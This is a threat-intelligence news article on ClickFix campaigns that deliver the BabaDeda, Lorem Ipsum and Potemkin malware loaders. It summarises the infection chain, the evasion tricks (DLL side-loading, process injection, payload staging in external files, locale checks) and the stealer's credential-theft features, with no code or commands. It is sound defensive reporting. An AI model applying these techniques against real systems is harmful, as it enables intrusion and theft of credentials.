ClickFix Attacks Deploy New Loaders: BabaDeda, Potemkin, and Lorem Ipsum

Cybersecurity researchers from Morphisec, BlueVoyant, and Huntress have independently identified a wave of ClickFix social engineering campaigns distributing three new malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. First observed in April 2026, BabaDeda Loader activity has primarily targeted education and financial organizations. Morphisec researcher Shmuel Uzan noted that while earlier BabaDeda activity concealed payloads inside legitimate-looking installer packages, the updated framework retains that same code genome but evolves into a far more capable loader engineered for stealth, evasion, and payload flexibility. BabaDeda itself is a crypter service first documented in November 2021, previously linked to campaigns against the cryptocurrency and Web3 sectors distributing information stealers, RATs, and LockBit ransomware.

The attack chain begins with a ClickFix lure that deceives users into executing attacker-supplied PowerShell commands. The resulting loader combines hidden PowerShell execution, in-memory shellcode, DLL side-loading, and external payload storage to drop information stealers and remote access trojans. The loader profiles the host, avoids running on Russian or Belarusian systems, and performs security product checks before injecting the main payload into a trusted Windows process such as svchost.exe. A notable design element is the staged component called Storage Crypter, which reads payloads from external storage-like files such as "List.Control.dat," keeping malicious code hidden from forensic analysis until moments before execution.

One of the malware families delivered through BabaDeda Loader is a .NET backdoor and information stealer capable of collecting detailed system information, discovering installed browser profiles, extracting cookies, browsing history, saved credentials, preferences, and local-state encryption keys, traversing directories based on configurable rules, reading and exfiltrating file contents, capturing screenshots, executing shell commands, and transferring data back to a C2 server. It leverages native Windows APIs for process interaction, memory operations, DPAPI access, Restart Manager behavior, and advanced file access. A second attack chain drops a ZIP archive using DLL side-loading to launch DanaBot and SectopRAT (aka ArechClient). Given the credential-harvesting capabilities of these loaders, users should verify exposed credentials using an email breach checker and test password strength with a password checker to reduce the impact of any compromise.